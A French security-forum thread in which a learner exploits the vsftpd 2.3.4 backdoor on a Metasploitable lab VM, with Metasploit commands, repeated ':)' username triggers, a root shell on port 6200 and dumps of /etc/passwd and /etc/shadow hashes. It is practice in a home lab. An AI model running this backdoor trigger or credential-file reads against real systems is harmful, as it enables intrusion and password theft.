Auteur Sujet: [Résolu] | connection telnet port 6200 metasploitable en root  (Lu 308 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne cmos
  • Nouvel inscrit
  • Messages: 5
  • +0/-0
Bonjour à tous,  ;)

Ma configuration : Dell Optiplex 7010 avec Ubuntu 20.04 et VM avec :
  • Kali -linux
  • Metasploitable
  • Windows 7
  • Ubuntu

Voilà, je vous expose mon problème :

Je réalise l'exploit suivant, sur vsftpd de la VM Metasploitable:



msf6 > use exploit/unix/ftp/vsftpd_234_backdoor                                           
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.1.64
rhost => 192.168.1.64
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.1.64:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.64:21 - USER: 331 Please specify the password.
[+] 192.168.1.64:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.64:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.64:6200) at 2021-04-02 05:47:30 -0400

 

Jusqu'ici tout va bien,

Je me connecte au ftp en root :


┌──(root💀kali)-[/home/kali]
└─# ftp 192.168.1.64 21
Connected to 192.168.1.64.
220 (vsFTPd 2.3.4)
Name (192.168.1.64:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Jusqu'ici tout va bien,

Mais lorsque je veux me connecter par telnet au port 6200, voilà ce que j'ai :

┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 6200
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
id;


Je n'ai aucune réaction de la commande (id;).

Je suis pourtant bien en root, comme indiqué ci-dessous :

[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.64:6200) at 2021-04-02 05:47:30 -0400

whoami
root


J'ai suivi les exemples  ici et ici

Je n'ai pas le prompt qui me ramène à (root-kali)

Serait-il possible d'avoir une explication,

Merci, @ bientôt
« Modifié: 05 avril 2021 à 10:47:02 par ZeR0-@bSoLu »

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 3126
  • +174/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : connection telnet port 6200 metasploitable en root
« Réponse #1 le: 02 avril 2021 à 15:03:25 »
Bonjour,

Je pense que tu devrais voir plus en détail comment marche telnet et l'exploit que tu utilises tout simplement ;)

Il y a quoi qui tourne sur le port 6200 ?

J'ai lu les 2 liens que tu as donné et tu as la réponse à ta question sur ces memes liens en plus , tu vois bien que tu n'a pas du tout activé le backdoor (cf. Tes propres retours du terminal) :)

De plus tu as un shell Root via l'exploit déjà :)
« Modifié: 02 avril 2021 à 15:14:02 par ZeR0-@bSoLu »
Mess  with the bests.
Die like the rest.

Hors ligne cmos
  • Nouvel inscrit
  • Messages: 5
  • +0/-0
Re : connection telnet port 6200 metasploitable en root
« Réponse #2 le: 03 avril 2021 à 13:02:23 »
Bonjour  ZeR0-@bSoLu,  :D

Bon, j'avance un peu.

Je n'avais pas activer le backdoor c'est pour ça que ça ne marchait pas ma connection au port 6200. Merci pour l'info.

J'ai fais un cat /etc/passwd , la commande me renvoie qu'il n'y a pas de mot de passe pour telnet, il indique "nonexistent".


cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false

Puis j'ai fait un cat /etc/shadow pour vérifier qu'il n'y a pas de hash :


cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::



┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21     
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER user:)
331 Please specify the password.
PASS pass
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER backdoored:)
331 Please specify the password.
PASS
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER backdoored:)
331 Please specify the password.
PASS invalid
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER backdoored:)
331 Please specify the password.
PASS pass
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER user:)
331 Please specify the password.
PASS pass
500 OOPS: priv_sock_get_result
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER backdoored:)
331 Please specify the password.
PASS nonexistent
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER user:)
331 Please specify the password.
PASS nonexistent
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER nope:)
331 Please specify the password.
PASS help
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER backdoored:)
331 Please specify the password.
PASS doesnotmatter
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user backdoored:)
331 Please specify the password.
pass nonexistent
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user backdoored:)
331 Please specify the password.
pass anonymous
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user backdoored:)
331 Please specify the password.
pass
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user backdoored:)
331 Please specify the password.
pass ohnoes
500 OOPS: priv_sock_get_result
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user backdoored:)
331 Please specify the password.
pass backdoored
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user user:)
331 Please specify the password.
pass
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user user:)
331 Please specify the password.
pass nonexistent
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user backdoored:)
331 Please specify the password.
pass 421 Timeout.
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user backdoored:)
331 Please specify the password.
pass doesnotmatter
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user backdoored:)
331 Please specify the password.
pass invalid
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user ohnoes:)
331 Please specify the password.
pass
500 OOPS: priv_sock_get_result
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user ohnoes:)
331 Please specify the password.
pass doesnotmatter
500 OOPS: priv_sock_get_result
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user :)
331 Please specify the password.
pass
530 Login incorrect.
^[ 
530 Please login with USER and PASS.
user :)
331 Please specify the password.
pass nonexistent
530 Login incorrect.
user :)
331 Please specify the password.
pass pass
530 Login incorrect.
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user :)
331 Please specify the password.
pass invalid
530 Login incorrect.
user :)
331 Please specify the password.
pass backdoored
530 Login incorrect.
user :)
331 Please specify the password.
pass doesnotmatter
530 Login incorrect.
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─# telnet 192.168.1.64 21                                               1 ⨯
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user :)
331 Please specify the password.
pass
530 Login incorrect.
user user:)
331 Please specify the password.
pass
Connection closed by foreign host.
                                                                             
┌──(root💀kali)-[/home/kali]
└─#
 


Puisqu'il n'y a pas de mot de passe, il ne me reste plus qu'a trouver le nom d'utlisateur avec le smiley ":)" pour activer le backdoor. Il y a beaucoup de site qui montre l'expoit avec different nom d'utilisateur et mot de passe mais aucun ne marche.

Donc je vais continuer à rechercher activement cette info.  :P

Merci pour l'aide @ bientôt

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 3126
  • +174/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : connection telnet port 6200 metasploitable en root
« Réponse #3 le: 03 avril 2021 à 14:57:34 »
Une fois de plus je t'invite à lire plus en détail comment marche l'exploit et à lire le code source tu aura surement ta réponse ;)

De plus tu es sur que ça avoir rapport avec l'utilisateur 'telnet' ? ce n'est tout simplement pas un simple login demandé par le backdoor ? ;)

Mais déjà tu avances :)
« Modifié: 03 avril 2021 à 15:13:01 par ZeR0-@bSoLu »
Mess  with the bests.
Die like the rest.

Hors ligne cmos
  • Nouvel inscrit
  • Messages: 5
  • +0/-0
Re : connection telnet port 6200 metasploitable en root
« Réponse #4 le: 05 avril 2021 à 09:46:50 »
Bonjour ZeR0-@bSoLu,  :D

 C'est bon j'ai réussi, quelle galère mais bon je suis content.  :P


└─# telnet 192.168.1.64 6200
Trying 192.168.1.64...
Connected to 192.168.1.64.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
: command not found
whoami
: command not found
whoami;
root
: command not found
^]

telnet> quit
Connection closed.


Merci pour l'aide,

@ bientôt

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 3126
  • +174/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : connection telnet port 6200 metasploitable en root
« Réponse #5 le: 05 avril 2021 à 10:46:36 »
Sujet résolu ;)
Mess  with the bests.
Die like the rest.